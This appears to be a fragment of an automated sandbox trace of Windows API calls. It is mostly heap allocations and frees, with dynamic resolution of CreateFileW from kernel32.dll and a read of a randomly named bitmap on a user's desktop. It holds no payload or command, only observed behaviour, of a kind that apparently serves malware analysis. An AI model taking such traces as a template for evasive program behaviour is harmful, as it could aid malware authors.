HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0124.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0124.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0124.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0124.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0124.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0124.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0124.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0124.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0124.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0124.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0124.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0124.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0124.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0124.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0124.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0124.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0124.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0124.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0124.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0124.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0124.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0124.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0124.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0124.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0124.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0124.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0124.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0124.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0124.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0124.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0124.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0124.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0124.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0124.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0124.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0124.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0124.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0124.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0124.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0124.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0124.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0124.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0124.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0124.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0124.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0124.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0124.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0124.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0124.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0124.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0124.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0124.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0124.529] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0124.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0124.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0124.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0124.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0124.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0124.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0124.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0124.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0124.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0124.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0124.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0124.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0124.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0124.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0124.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0124.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0124.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0124.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0124.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0124.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0124.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0124.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0124.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0124.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0124.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0124.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0124.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0124.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0124.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0124.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0124.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0124.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0124.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0124.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0124.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0124.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0124.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0124.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0124.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0124.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0124.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0124.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0124.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0124.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0124.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0124.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0124.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0124.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0124.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0124.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0124.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0124.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0124.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0124.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0124.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0124.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0124.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0124.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0125.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0125.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0125.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0125.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0125.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0125.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0125.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0125.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0125.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0125.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0125.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0125.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0125.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0125.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0125.247] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0125.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0125.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0125.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0125.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca808 [0125.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca808, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0125.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0125.247] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0125.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0125.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0125.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0125.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0125.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0125.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0125.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0125.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0125.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0125.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0125.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x499a008 [0125.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0125.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0125.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0125.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0125.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0125.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0125.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0125.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0125.248] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\OD9hoNYV uW0IIj2du.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\od9honyv uw0iij2du.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0125.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0125.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea490 [0125.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0125.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0125.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0125.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0125.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0125.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0125.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0125.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0125.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0125.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0125.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0125.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0125.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0125.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0125.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0125.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0125.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0125.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0125.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0125.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0125.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0125.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0125.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0125.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0125.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0125.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0125.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0125.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0125.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0125.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0125.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0125.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0125.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0125.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0125.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0125.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0125.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0125.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0125.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0125.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0125.251] FreeLibrary (hLibModule=0x772d0000) returned 1 [0125.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0125.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0125.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0125.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0125.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0125.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0125.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0125.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0125.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0125.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0125.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0125.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0125.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0125.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0125.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0125.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0125.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0125.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0125.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0125.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0125.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0125.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0125.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0125.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0125.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0125.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0125.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0125.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0125.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0125.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0125.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0125.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0125.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0125.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0125.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0125.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0125.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0125.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0125.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0125.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0125.252] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 1 [0125.252] TranslateMessage (lpMsg=0x144ebfc) returned 0 [0125.252] DispatchMessageW (lpMsg=0x144ebfc) returned 0x0 [0125.252] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 